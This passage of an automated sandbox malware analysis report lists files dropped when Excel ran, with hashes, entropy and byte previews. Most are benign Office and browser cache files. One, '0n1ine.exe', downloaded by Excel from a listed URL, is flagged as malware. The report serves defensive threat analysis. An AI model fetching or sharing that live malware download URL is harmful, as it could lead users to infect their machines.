SHA-512:	D7582E9DFE8461C428C922000C8A5B287CD4D4F484353A65242779B04BA9D2B4DFA0A528F4FC3AD60FFA0E57BD2835D5A6ECBDFD5C68E0CCAA7F9863DF1E5C0D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?><Rules xmlns="urn:Rules"><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" xmlns=""><S><Etw T="1" E="159" G="{02fd33df-f746-4a10-93a0-2bc6273bc8e4}" /><F T="2"><O T="AND"><L><O T="NE"><L><S T="1" F="Warning" /></L><R><V V="37" T="U32" /></R></O></L><R><O T="NE"><L><S T="1" F="Warning" /></L><R><V V="29" T="U32" /></R></O></R></O></F><TI T="3" I="10min" /><A T="4" E="TelemetrySuspend" /><A T="5" E="TelemetryShutdown" /></S><G I="true" R="TriggerOldest"><S T="2"><F N="RuleID" /><F N="RuleVersion" /><F N="Warning" /><F N="Info" /></S></G><C T="U32" I="0" O="false" N="ErrorCount"><C><S T="2" /></C></C><C T="U32" I="1" O="false" N="ErrorRuleId"><S T="2" F="RuleID" /></C><C T="U16" I="2" O="false" N="ErrorRuleVersion"><S T="2" F="RuleVersion" /></C><C T="U8" I="3" O="false" N="WarningInfo"><S T="2" F="Warning" /></C><C

C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal Download File
Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	SQLite Write-Ahead Log, version 3007000
Size (bytes):	4152
Entropy (8bit):	1.1811696691181857
Encrypted:	false
MD5:	8D5B264D38CE39E13E2EEFA200D11294
SHA1:	DB3907E027B43820D1470C2A7F93B3782FF05A10
SHA-256:	3E203873DD94C1E0F42CB483F1913D9E10D87180ACE00522DED9F5893CDFF7F6
SHA-512:	F572627771F76F85DDEE5F0B39F92E7E345EBD7F4B948F69B2C881275B0FB01BD6CC814B3692125CF209BC0183125BDD1B2EAD0F3ED89500CF023774F7FB6D0E
Malicious:	false
Preview:	7....-..........5=x...b.f_@H............5=x...b.v\|.}Z...SQLite format 3......@ ..................................................................................d....d.g..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.session Download File
Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	SQLite 3.x database, last written using SQLite version 3019003
Size (bytes):	12288
Entropy (8bit):	0.9279194729410528
Encrypted:	false
MD5:	385FD397FD2A30DB81F51FDBD4F72A8D
SHA1:	B5E7B3E0068E5E9C5B566ADE807F89718B32BD8A
SHA-256:	F93484A630FFAE446B7566FB0F70C4EEE8E38D61FE4F81ECC75653C95B0EFACA
SHA-512:	5F86841C97AA3D4E190353E80B2C9114631DED1579BFB242CABBF55A8F1EE05421E8C0834A839E38F94F1B3CE920D4B7C7ED7921E1808CC38D1DF08EDD8DDD00
Malicious:	false
Preview:	SQLite format 3......@ ..................................................................................d....d.g......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.session-journal Download File
Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Size (bytes):	13360
Entropy (8bit):	0.9050916354533916
Encrypted:	false
MD5:	7286D66A7F49CD9E39DE323BA3C7AE97
SHA1:	2CD5BBCA079F97FF458BA661784EA1E46AFA6E5A
SHA-256:	23A961C68DE8A4408289F36B253AADBD863D9B4DCCECFDEFD61B93F3B2ADB07E
SHA-512:	66D1D9E0EBBB17B41E5C011B744FEECDFD037944DAFE710EAB391CED87A3BD5AE0431248A1D57506FD9F547BAC20DDC0724B61040CEF81FF97728EFE8BD354D5
Malicious:	false
Preview:	............7..9....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ ..................................................................................d....d.g..................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\A5VQ85FW\NewErrorPageTemplate[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes):	1612
Entropy (8bit):	4.869554560514657
Encrypted:	false
MD5:	DFEABDE84792228093A5A270352395B6
SHA1:	E41258C9576721025926326F76063C2305586F76
SHA-256:	77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
SHA-512:	E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
Malicious:	false
Preview:	.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\A5VQ85FW\dnserror[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes):	2997
Entropy (8bit):	4.4885437940628465
Encrypted:	false
MD5:	2DC61EB461DA1436F5D22BCE51425660
SHA1:	E1B79BCAB0F073868079D807FAEC669596DC46C1
SHA-256:	ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
SHA-512:	A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
Malicious:	false
IE Cache URL:	res://ieframe.dll/dnserror.htm?ErrorStatus=0x800C0005&DNSError=9003
Preview:	.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can’t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can’t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\A5VQ85FW\errorPageStrings[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes):	4720
Entropy (8bit):	5.164796203267696
Encrypted:	false
MD5:	D65EC06F21C379C87040B83CC1ABAC6B
SHA1:	208D0A0BB775661758394BE7E4AFB18357E46C8B
SHA-256:	A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
SHA-512:	8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
Malicious:	false
IE Cache URL:	res://ieframe.dll/errorPageStrings.js
Preview:	.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\J7EK2SLI\2xLI[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Size (bytes):	228112
Entropy (8bit):	5.999902727526707
Encrypted:	false
MD5:	12CACC7BFE3CCB419F0FAFE32105FF26
SHA1:	495F63B2F6A6689A5D93774AA9E9A841B99ABC42
SHA-256:	0E9CE17E80E939F23139FBD0FB4EF3C8CC034FE4AD3E835C4CBF8D8423EF5B7E
SHA-512:	FE30A0FBD663742D7B3402A4BAD5E94507A0A7CA94ACB013F7B629CFD658B5D6DAA6EF4218741857AB45F7F26EE7992CFFE651AFAF10B51B7DAF2470CC9DE674
Malicious:	false
Preview:	07fL/MHsu3foDH98vdqBXgQjaYSBCMypLZUb0R6e/y5MVWJIeA2l1hYIWnHL06AhuNFKaTS3TPx1t+z5YkCNzFdam6MLHw9FmsC5xb5krxLT9D7imOyn15YRrQ+bWoEvYp5VYOE6pHbU+bEs9sJuQK2g9kVS4bVWtKqxOsL786KSeMRponv6yRk2hG/8c21K+o0RcPk+vCS+h7ER409CxAtZz0pb0AkibDP1VvEY68ew9kX6rywLV6pOUregZs3woZcygStS8uhEkxUDBjqrMajHksO+cG3b3gNYL9JQ56fNyHZVNuflSpaNUgeRV0+A0zMBw2jQclBMEReMpK0hFO6CuUdkqTq1iPiah0oBQc5VW3kGj9gZ+bk43s2oCrVxrxS+Het4LzcLvq5Lqc1aEbUa/m80COUmCBv26j3ezB9rXZPq7Bnm8g6imkHamh9cnZNTH/1D0V4AHiG3aB9uNbCX80eGCiTlh3h4cJQp9j6Or/wdeiyc62aJQWQienSjnP5ifkI58qLsfbppJPT5Kz5kfzBir9BmJ6tM81mFdcnMfHmurKUK3k7LvVgOFu+dvhxxQuvnie51uEONUZLik7KGI2TP/xt6FMDCf3wLsOSk5DhFL6CjOXNNVkF32Mzd0JeS0NSgiZ3T8lQkLXfhWohAJrlnYFMVIVDvFHUKkdYlkDo5SkpWg96IszURfz0xIGc0fzeDZGMEyGEomt1aHm9H122SPTdHrBaYCk/BpQVPOntu0cUyGgdxU2LFZj58+VgeL5QVvYCEbanKBsqEEwy1dSr37DxZeTbjEhqedmJFFrX3dGsgXWygTw79JtnN9fQ4DU6abZpkOwCNyy2fPKw/SRRGBzs4bmd214dTzcbEHRhgYr3zC7RFi8UFCi8tW260nLeuj8KAs+3njcMnlp3k46oq8aU1UokbCEIkvT5kMwnb4oSJeD9JORsbg+6pqOIf8aHxoCNhy6ghbawTM1w/GiD9et67n3A3dHGb

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\J7EK2SLI\NewErrorPageTemplate[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes):	1612
Entropy (8bit):	4.869554560514657
Encrypted:	false
MD5:	DFEABDE84792228093A5A270352395B6
SHA1:	E41258C9576721025926326F76063C2305586F76
SHA-256:	77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
SHA-512:	E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
Malicious:	false
IE Cache URL:	res://ieframe.dll/NewErrorPageTemplate.css
Preview:	.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\J7EK2SLI\dnserror[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes):	2997
Entropy (8bit):	4.4885437940628465
Encrypted:	false
MD5:	2DC61EB461DA1436F5D22BCE51425660
SHA1:	E1B79BCAB0F073868079D807FAEC669596DC46C1
SHA-256:	ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
SHA-512:	A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
Malicious:	false
Preview:	.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can’t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can’t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\J7EK2SLI\down[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 15 x 15, 8-bit colormap, non-interlaced
Size (bytes):	748
Entropy (8bit):	7.249606135668305
Encrypted:	false
MD5:	C4F558C4C8B56858F15C09037CD6625A
SHA1:	EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
SHA-256:	39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
SHA-512:	D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
Malicious:	false
Preview:	.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?\|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\J7EK2SLI\favicon[1].ico Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
Size (bytes):	5430
Entropy (8bit):	4.0126861171462025
Encrypted:	false
MD5:	F74755B4757448D71FDCB4650A701816
SHA1:	0BCBE73D6A198F6E5EBAFA035B734A12809CEFA6
SHA-256:	E78286D0F5DFA2C85615D11845D1B29B0BFEC227BC077E74CB1FF98CE8DF4C5A
SHA-512:	E0FB5F740D67366106E80CBF22F1DA3CF1D236FE11F469B665236EC8F7C08DEA86C21EC8F8E66FC61493D6A8F4785292CE911D38982DBFA7F5F51DADEBCC8725
Malicious:	false
IE Cache URL:	http://line.beibiandmom.com/favicon.ico
Preview:	............ .h...&... .... .........(....... ..... .....@.....................s...s...s...sw..r.......s...s...s...s.......s...s..s...s...s...s...r...s{..s...s#..s...s..r..s..s...s[..s...s...s..s...s...s...s}..s...sW..r..s...sm..sK..sC..sw..s..s...s%..s!..s..s...s...s...sU..s.sY..s...s..s..r#......s...s...s..s...r%..s[..s...s...s..s]..s...r.sS..s...sq..........s...s...s...s...s.......su..s...s.......s...s..s.sA..............s%..s..s#......r...r...s]..........s...s..sk..s...s...........s...s...s]......s...r..s7..........s...s..r...r...s...r...........s...s.......s...s..s7..........s...s..si..s?..s7..s...........s...s.......s...s...rW..........s...s..s...s...s...s...........s...s[..........ss..s...s.......s...s..sm..sI..s;..s.......s!..s..s#......s...s...s..sQ......s...s..s...r...sm..s...r...s...r...s...s...r...s...sQ..s..rK..s...sg..s'..........s...s...s..s...s'..s_..s...s...s...rQ..s..s...sK..r/..s3..sa..s...s...s!..s#..s..s...s...s...s...s...s...sy..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\0n1ine[1].exe Download File
Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):	167424
Entropy (8bit):	6.906520340690913
Encrypted:	false
MD5:	7494B31AF8F89F1051C7E9332FF7D331
SHA1:	258A679E71464F9422F6E0A6909CE47DA5A05EE6
SHA-256:	4A6604CB3A9A6570EAACFFB681B3CCD28D2521F03BB449F1A205525DD8172046
SHA-512:	7C55E2919E25D8112D6E6D8F711D3FF602511206E9F37D54F6197690F2FB5BD4BBD2AF63E79BE4D6DC66DC711DA8E4621081644B6FCEFE7FDF5D421992BBB832
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
IE Cache URL:	http://gstat.ddoborguild.com/0n1ine.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L...Ka.].....................VD.....s.............@...........................F......2..........................................(....pE.P...........................@................................................................................text............................... ..`.data... sC......,..................@....pevidu......PE.....................@....rsrc...P....pE.....................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\down[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 15 x 15, 8-bit colormap, non-interlaced
Size (bytes):	748
Entropy (8bit):	7.249606135668305
Encrypted:	false
MD5:	C4F558C4C8B56858F15C09037CD6625A
SHA1:	EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
SHA-256:	39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
SHA-512:	D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
Malicious:	false
IE Cache URL:	res://ieframe.dll/down.png
Preview:	.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?\|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\httpErrorPagesScripts[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes):	12105
Entropy (8bit):	5.451485481468043
Encrypted:	false
MD5:	9234071287E637F85D721463C488704C
SHA1:	CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
SHA-256:	65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
SHA-512:	87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
Malicious:	false
Preview:	...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)\|ftp\|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WHTRT9VA\A[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Size (bytes):	2476
Entropy (8bit):	5.979561495631902
Encrypted:	false
MD5:	6801BA93D27704EEDFAAC6031E932A6D
SHA1:	45BA2C47F2DFA49C2665A77C2D3A78AE39694043
SHA-256:	BFE4B82CFB225E09548A9CDAFCBC14F36C860F4FCCC71612A3348EC4D52E5B74
SHA-512:	788D0F58D01CDF04FB2545481DD7A4F2AFA083B52F978DAF4E91A8F0AE8DB82C2FA37E01B6B8AEAE34BFD2F9BFE72D1711AB8A343732B1AD74422C1A712AECCA
Malicious:	false
Preview:	3xtkxlUEsnKUrgziOL27n0kkFlkOFoaRzhJPJEGeFpPG3tX8B+04QsqTPsqpVbFK6XyofIIpezur+KRp3kd8pFV7XzL325LHgeXwSCAgYjQbtk/4rJYQWzKqAO+W0BK+mP9a2vC7yzbtueR17AJGif5ayubKMqqsnsSLsXXnWsX2SBJEpFloxnG+291Q+ALCRJDouBY0pB99sEwmJBbW0mhGQLvXhpzH7EBDykyFosKpoepn/53y+qccMnlfkjpc0gKxFUzoNy5aWDltQdOEfMbC+85sxvRId59mKopRxm83qNoMpSqm0TgiQy5ffV8Pj7IkyH1pZC6Z2tuIyr/Vx4v2Wco2NZpWV5FtKDceKYPjZmsREugOa8Tm2ZnaIuU070UzlGFWTz0VtgQ71nTajU1DCe5po8Jg+DER9ettVd1XOwr8MDbQnujk8RxxxNjzjvGqxOF1RXaluNxiqNpXqb6lP9K8BS9NWfv6UtyIkzlM0qxk4nyLgt2Pu4QehpGcU1QaV3Yobf1YFTX2hONR3Xi224IU4quTEhJKkmHUIAN/+znQylzgbzEDbL6Wr0xrDlU7HNu4pZIwCNqvlCwSHgVNMFz0rYtEE9Hak82srXFa0EhLRygpLQ3A4X8pBuZyN0Yf5+zU3YTBfWB/1zMPtoaz/fN1R9kILAMuozkJB47aFXC/Jd2xreS2qDQDOfzDS2eLmlX2XT+Tla/JZ+eiIKnQZ9B702fAt486Ywbk1ND9V0vV3/A8/OlW+cjzjdv4O8msHsomUqb1e7pw5Dn2j/9j51V15LFHjhddxWLtsBn0xBk0u+vGecRJ3c2jWWDKfqTmn6PsxyHvBQk3EY+DFFMjyHakqTkafW6/fyUURff3CpD09mwhLFios7fV97HmeetT+USgqQ13lO9hl6hII9PAY9ZKhcTPd08iMC8eWTZzoayVhzapSKvO3a0rv0aruB/yjVF1S4NKMdXPJNy6LAG8G77fD3aGVDdmg+U5

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WHTRT9VA\errorPageStrings[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes):	4720
Entropy (8bit):	5.164796203267696
Encrypted:	false
MD5:	D65EC06F21C379C87040B83CC1ABAC6B
SHA1:	208D0A0BB775661758394BE7E4AFB18357E46C8B
SHA-256:	A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
SHA-512:	8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
Malicious:	false
Preview:	.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WHTRT9VA\httpErrorPagesScripts[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes):	12105
Entropy (8bit):	5.451485481468043
Encrypted:	false
MD5:	9234071287E637F85D721463C488704C
SHA1:	CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
SHA-256:	65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
SHA-512:	87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
Malicious:	false
IE Cache URL:	res://ieframe.dll/httpErrorPagesScripts.js
Preview:	...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)\|ftp\|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WHTRT9VA\lXz[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Size (bytes):	288872
Entropy (8bit):	5.999874408289442
Encrypted:	false
MD5:	F6ED810CCF12CFBD1758B53D7D2C2C44
SHA1:	119EBB3C1E7578252EC018612C75121E833B7DE2
SHA-256:	C314D0B59A16F786F7F1F5D43D148186C31414F147C4639F6D36A04C90DE83A4
SHA-512:	8AA916624DED40DB6223096836DB89DA04A504F788BA39C88497A1E0ADE44D4AA31FF26E469C25C82720A94966A7F103CE97F97F6EA629C2F5A9412A2A827056
Malicious:	false
